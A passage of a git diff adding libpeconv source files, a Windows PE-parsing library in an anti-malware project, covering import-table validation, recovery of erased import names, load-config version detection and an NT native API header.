+ + if (lib_desc->OriginalFirstThunk == NULL && lib_desc->FirstThunk == NULL) { + break; + } + LPSTR lib_name = (LPSTR)((ULONGLONG)modulePtr + lib_desc->Name); + if (!is_valid_import_name(modulePtr, moduleSize, lib_name)) return false; + + DWORD call_via = lib_desc->FirstThunk; + DWORD thunk_addr = lib_desc->OriginalFirstThunk; + if (thunk_addr == NULL) thunk_addr = lib_desc->FirstThunk; + + DWORD *thunks = (DWORD*)((ULONGLONG)modulePtr + thunk_addr); + if (!peconv::validate_ptr(modulePtr, moduleSize, thunks, sizeof(DWORD))) return false; + + DWORD *callers = (DWORD*)((ULONGLONG)modulePtr + call_via); + if (!peconv::validate_ptr(modulePtr, moduleSize, callers, sizeof(DWORD))) return false; + + valid_records++; + } + + return (valid_records > 0); +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/imports_uneraser.cpp 
b/ai_anti_malware/libpeconv/libpeconv/src/imports_uneraser.cpp new file mode 100644 index 0000000..e8a9a5a --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/imports_uneraser.cpp @@ -0,0 +1,243 @@ +#include "peconv/imports_uneraser.h" + +#include + +using namespace peconv; + +LPVOID search_name(std::string name, const char* modulePtr, size_t moduleSize) +{ + const char* namec = name.c_str(); + const size_t searched_len = name.length() + 1; // with terminating NULL + const char* found_ptr = std::search(modulePtr, modulePtr + moduleSize, namec, namec + searched_len); + if (found_ptr == NULL) { + return NULL; + } + size_t o = found_ptr - modulePtr; + if (o < moduleSize) { + return (LPVOID)(found_ptr); + } + return NULL; +} + +bool ImportsUneraser::writeFoundDllName(IMAGE_IMPORT_DESCRIPTOR* lib_desc, const std::string &found_name) +{ +#ifdef _DEBUG + std::cout << "Found name:" << found_name << std::endl; +#endif + LPSTR name_ptr = (LPSTR)((ULONGLONG) modulePtr + lib_desc->Name); + size_t full_name_len = found_name.length() + 1; // with terminating zero + if (!validate_ptr(modulePtr, moduleSize, name_ptr, full_name_len)) { + //corner case: allow to save the name at the very end of the buffer, without the terminating zero + full_name_len--; + if (!validate_ptr(modulePtr, moduleSize, name_ptr, full_name_len)) { + return false; //invalid pointer, cannot save + } + } + memcpy(name_ptr, found_name.c_str(), full_name_len); + return true; +} + +bool ImportsUneraser::uneraseDllName(IMAGE_IMPORT_DESCRIPTOR* lib_desc, const std::string &dll_name) +{ + LPSTR name_ptr = nullptr; + if (lib_desc->Name != 0) { + name_ptr = (LPSTR)((ULONGLONG) modulePtr + lib_desc->Name); + } + if (name_ptr == nullptr || !validate_ptr(modulePtr, moduleSize, name_ptr, sizeof(char) * MIN_DLL_LEN)) { + //try to get the cave: + DWORD cave_size = DWORD(dll_name.length() + 1 + 5); //ending null + padding + PBYTE ptr = find_ending_cave(modulePtr, moduleSize, cave_size); + if (ptr == nullptr) { + 
std::cerr << "Cannot save the DLL name: " << dll_name << std::endl; + return false; + } + DWORD cave_rva = static_cast(ptr - modulePtr); + lib_desc->Name = cave_rva; + } + + if (writeFoundDllName(lib_desc, dll_name)) { + return true; // written the found name + } + return false; +} + +template +bool ImportsUneraser::findNameInBinaryAndFill(IMAGE_IMPORT_DESCRIPTOR* lib_desc, + LPVOID call_via_ptr, + LPVOID thunk_ptr, + const FIELD_T ordinal_flag, + std::map> &addr_to_func +) +{ + if (call_via_ptr == NULL || modulePtr == NULL || lib_desc == NULL) { + return false; //malformed input + } + IMAGE_DATA_DIRECTORY *importsDir = get_directory_entry((BYTE*)modulePtr, IMAGE_DIRECTORY_ENTRY_IMPORT); + if (!importsDir) return false; + + const DWORD impAddr = importsDir->VirtualAddress; //start of the import table + + FIELD_T *call_via_val = (FIELD_T*)call_via_ptr; + if (*call_via_val == 0) { + //nothing to fill, probably the last record + return false; + } + ULONGLONG searchedAddr = ULONGLONG(*call_via_val); + bool is_name_saved = false; + + FIELD_T lastOrdinal = 0; //store also ordinal of the matching function + std::set::iterator funcname_itr = addr_to_func[searchedAddr].begin(); + + for (funcname_itr = addr_to_func[searchedAddr].begin(); + funcname_itr != addr_to_func[searchedAddr].end(); + ++funcname_itr) + { + const ExportedFunc &found_func = *funcname_itr; + lastOrdinal = found_func.funcOrdinal; + + const char* names_start = ((const char*) modulePtr + impAddr); + BYTE* found_ptr = (BYTE*) search_name(found_func.funcName, names_start, moduleSize - (names_start - (const char*)modulePtr)); + if (!found_ptr) { + //name not found in the binary + //TODO: maybe it is imported by ordinal? 
+ continue; + } + + const ULONGLONG name_offset = (ULONGLONG)found_ptr - (ULONGLONG)modulePtr; +#ifdef _DEBUG + //if it is not the first name from the list, inform about it: + if (funcname_itr != addr_to_func[searchedAddr].begin()) { + std::cout << ">[*][" << std::hex << searchedAddr << "] " << found_func.toString() << std::endl; + } + std::cout <<"[+] Found the name at: " << std::hex << name_offset << std::endl; +#endif + PIMAGE_IMPORT_BY_NAME imp_field = reinterpret_cast(name_offset - sizeof(WORD)); // substract the size of Hint + //TODO: validate more... + memcpy(thunk_ptr, &imp_field, sizeof(FIELD_T)); +#ifdef _DEBUG + std::cout << "[+] Wrote found to offset: " << std::hex << call_via_ptr << std::endl; +#endif + is_name_saved = true; + break; + } + //name not found or could not be saved - fill the ordinal instead: + if (!is_name_saved && lastOrdinal != 0) { +#ifdef _DEBUG + std::cout << "[+] Filling ordinal: " << lastOrdinal << std::endl; +#endif + FIELD_T ord_thunk = lastOrdinal | ordinal_flag; + memcpy(thunk_ptr, &ord_thunk, sizeof(FIELD_T)); + is_name_saved = true; + } + return is_name_saved; +} + +template +bool ImportsUneraser::writeFoundFunction(IMAGE_THUNK_DATA_T* desc, const FIELD_T ordinal_flag, const ExportedFunc &foundFunc) +{ + if (foundFunc.isByOrdinal) { + FIELD_T ordinal = foundFunc.funcOrdinal | ordinal_flag; + FIELD_T* by_ord = (FIELD_T*) desc; + *by_ord = ordinal; +#ifdef _DEBUG + std::cout << "[+] Saved ordinal" << std::endl; +#endif + return true; + } + + PIMAGE_IMPORT_BY_NAME by_name = (PIMAGE_IMPORT_BY_NAME) ((ULONGLONG) modulePtr + desc->u1.AddressOfData); + + LPSTR func_name_ptr = reinterpret_cast(by_name->Name); + std::string found_name = foundFunc.funcName; + bool is_nameptr_valid = validate_ptr(modulePtr, moduleSize, func_name_ptr, found_name.length()); + // try to save the found name under the pointer: + if (is_nameptr_valid) { + by_name->Hint = MASK_TO_WORD(foundFunc.funcOrdinal); + memcpy(func_name_ptr, found_name.c_str(), 
found_name.length() + 1); // with the ending '\0' +#ifdef _DEBUG + std::cout << "[+] Saved name" << std::endl; +#endif + return true; + } + return false; +} + +template +bool ImportsUneraser::fillImportNames( + IN OUT IMAGE_IMPORT_DESCRIPTOR* lib_desc, + IN const FIELD_T ordinal_flag, + IN std::map> &addr_to_func, + OUT OPTIONAL ImpsNotCovered* notCovered +) +{ + if (lib_desc == NULL) return false; + + FIELD_T call_via = lib_desc->FirstThunk; + if (call_via == NULL) return false; + + size_t processed_imps = 0; + size_t recovered_imps = 0; + + FIELD_T thunk_addr = lib_desc->OriginalFirstThunk; + if (thunk_addr == NULL) { + thunk_addr = call_via; + } + + BYTE* call_via_ptr = (BYTE*)((ULONGLONG)modulePtr + call_via); + BYTE* thunk_ptr = (BYTE*)((ULONGLONG)modulePtr + thunk_addr); + for (; + call_via_ptr != NULL && thunk_ptr != NULL; + call_via_ptr += sizeof(FIELD_T), thunk_ptr += sizeof(FIELD_T) + ) + { + FIELD_T *thunk_val = (FIELD_T*)thunk_ptr; + FIELD_T *call_via_val = (FIELD_T*)call_via_ptr; + if (*call_via_val == 0) { + //nothing to fill, probably the last record + break; + } + IMAGE_THUNK_DATA_T* desc = (IMAGE_THUNK_DATA_T*)thunk_ptr; + if (desc->u1.Function == NULL) { + break; + } + ULONGLONG searchedAddr = ULONGLONG(*call_via_val); + std::map>::const_iterator found_itr = addr_to_func.find(searchedAddr); + if (found_itr == addr_to_func.end() || found_itr->second.size() == 0) { + //not found, move on + if (notCovered) { + notCovered->insert((call_via_ptr - modulePtr), searchedAddr); + } + continue; + } + std::set::const_iterator funcname_itr = found_itr->second.begin(); + const peconv::ExportedFunc &foundFunc = *funcname_itr; + +#ifdef _DEBUG + std::cout << "[*][" << std::hex << searchedAddr << "] " << funcname_itr->toString() << std::endl; +#endif + bool is_name_saved = writeFoundFunction(desc, ordinal_flag, *funcname_itr); + if (!is_name_saved) { + is_name_saved = findNameInBinaryAndFill(lib_desc, call_via_ptr, thunk_ptr, ordinal_flag, addr_to_func); + } + 
processed_imps++; + if (is_name_saved) recovered_imps++; + } + + return (recovered_imps == processed_imps); +} + +bool ImportsUneraser::uneraseDllImports(IN OUT IMAGE_IMPORT_DESCRIPTOR* lib_desc, IN ImportedDllCoverage &dllCoverage, OUT OPTIONAL ImpsNotCovered* notCovered) +{ + //everything mapped, now recover it: + bool is_filled = false; + if (!is64) { + is_filled = fillImportNames(lib_desc, IMAGE_ORDINAL_FLAG32, dllCoverage.addrToFunc, notCovered); + } else { + is_filled = fillImportNames(lib_desc, IMAGE_ORDINAL_FLAG64, dllCoverage.addrToFunc, notCovered); + } + if (!is_filled) { + std::cerr << "[-] Could not fill some import names!" << std::endl; + return false; + } + return is_filled; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/load_config_util.cpp b/ai_anti_malware/libpeconv/libpeconv/src/load_config_util.cpp new file mode 100644 index 0000000..b6be95f --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/load_config_util.cpp @@ -0,0 +1,57 @@ +#include "peconv/load_config_util.h" +#include "peconv/pe_hdrs_helper.h" + +BYTE* peconv::get_load_config_ptr(BYTE* buffer, size_t buf_size) +{ + if (!buffer || !buf_size) return nullptr; + IMAGE_DATA_DIRECTORY* dir = peconv::get_directory_entry(buffer, IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG); + if (!dir) { + return 0; + } + DWORD entry_rva = dir->VirtualAddress; + DWORD entry_size = dir->Size; + if (!peconv::validate_ptr(buffer, buf_size, buffer + entry_rva, entry_size)) { + return 0; + } + IMAGE_LOAD_CONFIG_DIRECTORY32* ldc = reinterpret_cast((ULONG_PTR)buffer + entry_rva); + return reinterpret_cast(ldc); +} + +peconv::t_load_config_ver peconv::get_load_config_version(BYTE* buffer, size_t buf_size, BYTE* ld_config_ptr) +{ + if (!buffer || !buf_size || !ld_config_ptr) peconv::LOAD_CONFIG_NONE; + bool is64b = peconv::is64bit(buffer); + + if (!peconv::validate_ptr(buffer, buf_size, ld_config_ptr, sizeof(peconv::IMAGE_LOAD_CONFIG_DIR32_W7))) { + return peconv::LOAD_CONFIG_NONE; + } + + 
peconv::IMAGE_LOAD_CONFIG_DIR32_W7* smallest = (peconv::IMAGE_LOAD_CONFIG_DIR32_W7*)ld_config_ptr; + const size_t curr_size = smallest->Size; + + if (is64b) { + switch (curr_size) { + case sizeof(peconv::IMAGE_LOAD_CONFIG_DIR64_W7) : + return peconv::LOAD_CONFIG_W7_VER; + case sizeof(peconv::IMAGE_LOAD_CONFIG_DIR64_W8) : + return peconv::LOAD_CONFIG_W8_VER; + case sizeof(peconv::IMAGE_LOAD_CONFIG_DIR64_W10) : + return peconv::LOAD_CONFIG_W10_VER; + default: + return LOAD_CONFIG_UNK_VER; + } + } + else { + switch (curr_size) { + case sizeof(peconv::IMAGE_LOAD_CONFIG_DIR32_W7) : + return peconv::LOAD_CONFIG_W7_VER; + case sizeof(peconv::IMAGE_LOAD_CONFIG_DIR32_W8) : + return peconv::LOAD_CONFIG_W8_VER; + case sizeof(peconv::IMAGE_LOAD_CONFIG_DIR32_W10) : + return peconv::LOAD_CONFIG_W10_VER; + default: + return LOAD_CONFIG_UNK_VER; + } + } + return LOAD_CONFIG_UNK_VER; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/ntddk.h b/ai_anti_malware/libpeconv/libpeconv/src/ntddk.h new file mode 100644 index 0000000..e840dc5 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/ntddk.h @@ -0,0 +1,4302 @@ +#ifndef __NTDLL_H__ +#define __NTDLL_H__ + +#ifdef __cplusplus +extern "C" { +#endif +#include + +#ifdef _NTDDK_ +#error This header cannot be compiled together with NTDDK +#endif + + +#ifndef _NTDLL_SELF_ // Auto-insert the library +#pragma comment(lib, "Ntdll.lib") +#endif + +#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union + +#pragma warning(push) +#pragma warning(disable:4005) +#include +#pragma warning(pop) + +//------------------------------------------------------------------------------ +// Defines for NTSTATUS + +typedef long NTSTATUS; + +#ifndef NT_SUCCESS +#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) +#endif + +#ifndef STATUS_SUCCESS +#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) +#endif + +#ifndef STATUS_UNSUCCESSFUL +#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L) +#endif + +#ifndef ASSERT +#ifdef 
_DEBUG +#define ASSERT(x) assert(x) +#else +#define ASSERT(x) /* x */ +#endif +#endif + +//------------------------------------------------------------------------------ +// Structures + +typedef enum _EVENT_TYPE +{ + NotificationEvent, + SynchronizationEvent + +} EVENT_TYPE; + +// +// ANSI strings are counted 8-bit character strings. If they are +// NULL terminated, Length does not include trailing NULL. +// + +#ifndef _NTSECAPI_ +typedef struct _STRING +{ + USHORT Length; + USHORT MaximumLength; + PCHAR Buffer; + +} STRING, *PSTRING; + +// +// Unicode strings are counted 16-bit character strings. If they are +// NULL terminated, Length does not include trailing NULL. +// + +typedef struct _UNICODE_STRING +{ + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; + +} UNICODE_STRING, *PUNICODE_STRING; +#endif // _NTSECAPI_ + +typedef STRING ANSI_STRING; +typedef PSTRING PANSI_STRING; + +typedef STRING OEM_STRING; +typedef PSTRING POEM_STRING; +typedef CONST STRING* PCOEM_STRING; + +typedef const UNICODE_STRING *PCUNICODE_STRING; + +#define UNICODE_NULL ((WCHAR)0) // winnt + +// +// Valid values for the Attributes field +// + +#ifndef OBJ_CASE_INSENSITIVE +#define OBJ_INHERIT 0x00000002L +#define OBJ_PERMANENT 0x00000010L +#define OBJ_EXCLUSIVE 0x00000020L +#define OBJ_CASE_INSENSITIVE 0x00000040L +#define OBJ_OPENIF 0x00000080L +#define OBJ_OPENLINK 0x00000100L +#define OBJ_KERNEL_HANDLE 0x00000200L +#define OBJ_FORCE_ACCESS_CHECK 0x00000400L +#define OBJ_VALID_ATTRIBUTES 0x000007F2L + +// +// Object Attributes structure +// + +typedef struct _OBJECT_ATTRIBUTES +{ + ULONG Length; + HANDLE RootDirectory; + PUNICODE_STRING ObjectName; + ULONG Attributes; + PVOID SecurityDescriptor; // Points to type SECURITY_DESCRIPTOR + PVOID SecurityQualityOfService; // Points to type SECURITY_QUALITY_OF_SERVICE + +} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; +#endif // OBJ_CASE_INSENSITIVE + +// +// IO_STATUS_BLOCK +// + +typedef struct _IO_STATUS_BLOCK +{ + union + { + NTSTATUS 
Status; + PVOID Pointer; + }; + + ULONG_PTR Information; + +} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; + +// +// ClientId +// + +typedef struct _CLIENT_ID +{ + HANDLE UniqueProcess; + HANDLE UniqueThread; + +} CLIENT_ID, *PCLIENT_ID; + + +// +// CURDIR structure +// + +typedef struct _CURDIR +{ + UNICODE_STRING DosPath; + HANDLE Handle; + +} CURDIR, *PCURDIR; + + +//------------------------------------------------------------------------------ +// Macros + +// INIT_UNICODE_STRING is a replacement of RtlInitUnicodeString +#ifndef INIT_UNICODE_STRING +#define INIT_UNICODE_STRING(us, wch) \ + us.MaximumLength = (USHORT)sizeof(wch); \ + us.Length = (USHORT)(wcslen(wch) * sizeof(WCHAR)); \ + us.Buffer = wch +#endif + + +#ifndef InitializeObjectAttributes +#define InitializeObjectAttributes( p, n, a, r, s ) { \ + (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ + (p)->RootDirectory = r; \ + (p)->Attributes = a; \ + (p)->ObjectName = n; \ + (p)->SecurityDescriptor = s; \ + (p)->SecurityQualityOfService = NULL; \ + } +#endif + + +#ifndef InitializePortHeader +#define InitializeMessageHeader( ph, l, t ) { \ + (ph)->TotalLength = (USHORT)(l); \ + (ph)->DataLength = (USHORT)(l - sizeof(PORT_MESSAGE)); \ + (ph)->Type = (USHORT)(t); \ + (ph)->VirtualRangesOffset = 0; \ + } +#endif + +//----------------------------------------------------------------------------- +// Image functions + +NTSYSAPI +PVOID +NTAPI +RtlImageNtHeader ( + IN PVOID BaseAddress + ); + +NTSYSAPI +PVOID +NTAPI +RtlImageDirectoryEntryToData ( + IN PVOID Base, + IN BOOLEAN MappedAsImage, + IN USHORT DirectoryEntry, + OUT PULONG Size + ); + +//----------------------------------------------------------------------------- +// Unicode string functions + +NTSYSAPI +NTSTATUS +NTAPI +RtlStringFromGUID( + IN REFGUID Guid, + OUT PUNICODE_STRING GuidString + ); + + +NTSYSAPI +VOID +NTAPI +RtlInitUnicodeString( + PUNICODE_STRING DestinationString, + PCWSTR SourceString + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlCreateUnicodeString( + 
OUT PUNICODE_STRING DestinationString, + IN PCWSTR SourceString + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlCreateUnicodeStringFromAsciiz( + OUT PUNICODE_STRING Destination, + IN PCSTR Source + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlPrefixUnicodeString ( + IN PUNICODE_STRING String1, + IN PUNICODE_STRING String2, + IN BOOLEAN CaseInSensitive + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlDuplicateUnicodeString( + IN BOOLEAN AllocateNew, + IN PUNICODE_STRING SourceString, + OUT PUNICODE_STRING TargetString + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlAppendUnicodeToString ( + PUNICODE_STRING Destination, + PCWSTR Source + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlAppendUnicodeStringToString( + IN OUT PUNICODE_STRING Destination, + IN PUNICODE_STRING Source + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlUnicodeStringToInteger ( + IN PUNICODE_STRING String, + IN ULONG Base OPTIONAL, + OUT PULONG Value + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlIntegerToUnicodeString ( + IN ULONG Value, + IN ULONG Base OPTIONAL, + IN OUT PUNICODE_STRING String + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlGUIDFromString( + IN PUNICODE_STRING GuidString, + OUT GUID *Guid + ); + + +NTSYSAPI +LONG +NTAPI +RtlCompareUnicodeString ( + IN PUNICODE_STRING String1, + IN PUNICODE_STRING String2, + IN BOOLEAN CaseInSensitive + ); + + +NTSYSAPI +VOID +NTAPI +RtlCopyUnicodeString( + OUT PUNICODE_STRING DestinationString, + IN PUNICODE_STRING SourceString + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlUpcaseUnicodeString ( + OUT PUNICODE_STRING DestinationString, + IN PUNICODE_STRING SourceString, + IN BOOLEAN AllocateDestinationString + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlDowncaseUnicodeString ( + OUT PUNICODE_STRING DestinationString, + IN PUNICODE_STRING SourceString, + IN BOOLEAN AllocateDestinationString + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlEqualUnicodeString ( + IN PUNICODE_STRING String1, + IN PUNICODE_STRING String2, + IN BOOLEAN CaseInSensitive + ); + + +NTSYSAPI +VOID +NTAPI +RtlFreeUnicodeString( + IN PUNICODE_STRING 
UnicodeString + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlAnsiStringToUnicodeString ( + OUT PUNICODE_STRING DestinationString, + IN PANSI_STRING SourceString, + IN BOOLEAN AllocateDestinationString + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlUnicodeStringToAnsiString ( + OUT PANSI_STRING DestinationString, + IN PUNICODE_STRING SourceString, + IN BOOLEAN AllocateDestinationString + ); + + +NTSYSAPI +VOID +NTAPI +RtlInitAnsiString ( + OUT PANSI_STRING DestinationString, + IN PCHAR SourceString + ); + + +NTSYSAPI +VOID +NTAPI +RtlFreeAnsiString ( + IN PANSI_STRING AnsiString + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlFormatCurrentUserKeyPath( + OUT PUNICODE_STRING CurrentUserKeyPath + ); + + +NTSYSAPI +VOID +NTAPI +RtlRaiseStatus ( + IN NTSTATUS Status + ); + + +NTSYSAPI +VOID +NTAPI +DbgBreakPoint( + VOID + ); + + +NTSYSAPI +ULONG +_cdecl +DbgPrint ( + PCH Format, + ... + ); + + +NTSYSAPI +ULONG +NTAPI +RtlRandom( + IN OUT PULONG Seed + ); + +//----------------------------------------------------------------------------- +// Critical section functions + +NTSYSAPI +NTSTATUS +NTAPI +RtlInitializeCriticalSection( + IN PRTL_CRITICAL_SECTION CriticalSection + ); + + +NTSYSAPI +BOOL +NTAPI +RtlTryEnterCriticalSection( + IN PRTL_CRITICAL_SECTION CriticalSection + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlEnterCriticalSection( + IN PRTL_CRITICAL_SECTION CriticalSection + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlLeaveCriticalSection( + IN PRTL_CRITICAL_SECTION CriticalSection + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlDeleteCriticalSection( + IN PRTL_CRITICAL_SECTION CriticalSection + ); + +//----------------------------------------------------------------------------- +// Object functions + +// +// Object Manager Directory Specific Access Rights. 
+// + +#ifndef DIRECTORY_QUERY +#define DIRECTORY_QUERY (0x0001) +#define DIRECTORY_TRAVERSE (0x0002) +#define DIRECTORY_CREATE_OBJECT (0x0004) +#define DIRECTORY_CREATE_SUBDIRECTORY (0x0008) +#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF) +#endif + +typedef enum _POOL_TYPE { + NonPagedPool, + PagedPool, + NonPagedPoolMustSucceed, + DontUseThisType, + NonPagedPoolCacheAligned, + PagedPoolCacheAligned, + NonPagedPoolCacheAlignedMustS, + MaxPoolType +} POOL_TYPE; + + +// +// For NtQueryObject +// + +typedef enum _OBJECT_INFORMATION_CLASS { + ObjectBasicInformation, // = 0 + ObjectNameInformation, // = 1 + ObjectTypeInformation, // = 2 + ObjectTypesInformation, // = 3 //object handle is ignored + ObjectHandleFlagInformation // = 4 +} OBJECT_INFORMATION_CLASS; + +// +// NtQueryObject uses ObjectBasicInformation +// + +typedef struct _OBJECT_BASIC_INFORMATION { + ULONG Attributes; + ACCESS_MASK GrantedAccess; + ULONG HandleCount; + ULONG PointerCount; + ULONG PagedPoolCharge; + ULONG NonPagedPoolCharge; + ULONG Reserved[3]; + ULONG NameInfoSize; + ULONG TypeInfoSize; + ULONG SecurityDescriptorSize; + LARGE_INTEGER CreationTime; +} OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION; + +// +// NtQueryObject uses ObjectNameInformation +// + +typedef struct _OBJECT_NAME_INFORMATION { + UNICODE_STRING Name; +} OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION; + +// +// NtQueryObject uses ObjectTypeInformation +// + +typedef struct _OBJECT_TYPE_INFORMATION { + UNICODE_STRING TypeName; + ULONG TotalNumberOfObjects; + ULONG TotalNumberOfHandles; + ULONG TotalPagedPoolUsage; + ULONG TotalNonPagedPoolUsage; + ULONG TotalNamePoolUsage; + ULONG TotalHandleTableUsage; + ULONG HighWaterNumberOfObjects; + ULONG HighWaterNumberOfHandles; + ULONG HighWaterPagedPoolUsage; + ULONG HighWaterNonPagedPoolUsage; + ULONG HighWaterNamePoolUsage; + ULONG HighWaterHandleTableUsage; + ULONG InvalidAttributes; + GENERIC_MAPPING GenericMapping; + ULONG ValidAccessMask; + BOOLEAN 
SecurityRequired; + BOOLEAN MaintainHandleCount; + POOL_TYPE PoolType; + ULONG DefaultPagedPoolCharge; + ULONG DefaultNonPagedPoolCharge; +} OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION; + +// +// NtQueryObject uses ObjectHandleFlagInformation +// NtSetInformationObject uses ObjectHandleFlagInformation +// + +typedef struct _OBJECT_HANDLE_FLAG_INFORMATION { + BOOLEAN Inherit; + BOOLEAN ProtectFromClose; +} OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION; + +// +// NtQueryDirectoryObject uses this type +// + +typedef struct _OBJECT_DIRECTORY_INFORMATION { + UNICODE_STRING Name; + UNICODE_STRING TypeName; +} OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION; + + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenDirectoryObject( + OUT PHANDLE DirectoryHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryDirectoryObject( + IN HANDLE DirectoryHandle, + OUT PVOID Buffer, + IN ULONG Length, + IN BOOLEAN ReturnSingleEntry, + IN BOOLEAN RestartScan, + IN OUT PULONG Context, + OUT PULONG ReturnLength OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryObject ( + IN HANDLE ObjectHandle, + IN OBJECT_INFORMATION_CLASS ObjectInformationClass, + OUT PVOID ObjectInformation, + IN ULONG Length, + OUT PULONG ResultLength OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtSetInformationObject ( + IN HANDLE ObjectHandle, + IN OBJECT_INFORMATION_CLASS ObjectInformationClass, + IN PVOID ObjectInformation, + IN ULONG Length + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtDuplicateObject ( + IN HANDLE SourceProcessHandle, + IN HANDLE SourceHandle, + IN HANDLE TargetProcessHandle OPTIONAL, + OUT PHANDLE TargetHandle OPTIONAL, + IN ACCESS_MASK DesiredAccess, + IN ULONG HandleAttributes, + IN ULONG Options + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQuerySecurityObject ( + IN HANDLE ObjectHandle, + IN SECURITY_INFORMATION SecurityInformation, + OUT PSECURITY_DESCRIPTOR SecurityDescriptor, + IN ULONG DescriptorLength, + 
OUT PULONG ReturnLength + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtSetSecurityObject ( + IN HANDLE ObjectHandle, + IN SECURITY_INFORMATION SecurityInformation, + IN PSECURITY_DESCRIPTOR SecurityDescriptor + ); + + +//----------------------------------------------------------------------------- +// Handle table RTL functions + +#define LEVEL_HANDLE_ID 0x74000000 +#define LEVEL_HANDLE_ID_MASK 0xFF000000 +#define LEVEL_HANDLE_INDEX_MASK 0x00FFFFFF + +typedef enum _RTL_GENERIC_COMPARE_RESULTS { + GenericLessThan, + GenericGreaterThan, + GenericEqual +} RTL_GENERIC_COMPARE_RESULTS; + + +typedef struct _RTL_SPLAY_LINKS +{ + struct _RTL_SPLAY_LINKS *Parent; + struct _RTL_SPLAY_LINKS *LeftChild; + struct _RTL_SPLAY_LINKS *RightChild; +} RTL_SPLAY_LINKS, *PRTL_SPLAY_LINKS; + + +struct _RTL_GENERIC_TABLE; + +typedef +RTL_GENERIC_COMPARE_RESULTS +(NTAPI * PRTL_GENERIC_COMPARE_ROUTINE) ( + struct _RTL_GENERIC_TABLE *Table, + PVOID FirstStruct, + PVOID SecondStruct + ); + +typedef +PVOID +(NTAPI *PRTL_GENERIC_ALLOCATE_ROUTINE) ( + struct _RTL_GENERIC_TABLE *Table, + ULONG ByteSize + ); + +typedef +VOID +(NTAPI *PRTL_GENERIC_FREE_ROUTINE) ( + struct _RTL_GENERIC_TABLE *Table, + PVOID Buffer + ); + + +typedef struct _RTL_GENERIC_TABLE { + PRTL_SPLAY_LINKS TableRoot; + LIST_ENTRY InsertOrderList; + PLIST_ENTRY OrderedPointer; + ULONG WhichOrderedElement; + ULONG NumberGenericTableElements; + PRTL_GENERIC_COMPARE_ROUTINE CompareRoutine; + PRTL_GENERIC_ALLOCATE_ROUTINE AllocateRoutine; + PRTL_GENERIC_FREE_ROUTINE FreeRoutine; + PVOID TableContext; +} RTL_GENERIC_TABLE, *PRTL_GENERIC_TABLE; + + +typedef struct _RTL_HANDLE_TABLE_ENTRY +{ + struct _RTL_HANDLE_TABLE_ENTRY *Next; /* pointer to next free handle */ + PVOID Object; + +} RTL_HANDLE_TABLE_ENTRY, *PRTL_HANDLE_TABLE_ENTRY; + + +typedef struct _RTL_HANDLE_TABLE +{ + ULONG MaximumNumberOfHandles; + ULONG SizeOfHandleTableEntry; + ULONG Unknown01; + ULONG Unknown02; + PRTL_HANDLE_TABLE_ENTRY FreeHandles; + PRTL_HANDLE_TABLE_ENTRY 
